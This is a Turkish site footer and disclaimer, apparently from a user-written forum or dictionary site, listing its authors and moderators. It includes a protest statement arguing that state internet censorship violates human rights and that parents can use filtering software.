buraya yazılanların hakları Sir Anthony Hopkins'e aittir.
yazan eden compumaster, ilgilenen eden fader
modere edenler basond, compumaster, fraise, kibritsuyu, rakicandir
bu sitede yazılanların hiçbiri doğru değildir. site içeriği küçükler için sakıncalı olabilir. yazılardan yazarları sorumludur. kaynak göstermeden alıntılanamaz. devlet tarafından atanmış bir kurumun internet üzerinde kimin hangi bilgiye ulaşıp ulaşamayacağına karar vermesi insan haklarına aykırıdır. web siteleri kullanıcıların istekleri doğrultusunda bağlandıkları yerlerdir. kullanıcılar isterlerse bir web sitesine bağlanmayabilirler. bu güçleri ve imkanları mevcuttur. bir kullanıcı bir siteye bağlanmak istiyorsa bu onun tercihi ve hakkıdır. bağlanmak istemiyorsa bu yine onun tercihi ve hakkıdır. halkın kendisine hizmet etmesi için görevlendirdiği kurumlar hadlerini aşıp halka neye ulaşıp ulaşmayacağını bilmeyen cahil cühela muamelesi edemezler. ebeveynlerin çocuklarını sakıncalı içeriklerden koruması için çok sayıda bedava ve ücretli yazılım mevcuttur. bu yazılımlar bir web tarayıcısını kullanmaktan daha karmaşık teknik bilgi gerektirmemektedir. devletin milletini küçük düşürmesi ve ebleh yerine koyması yasaktır.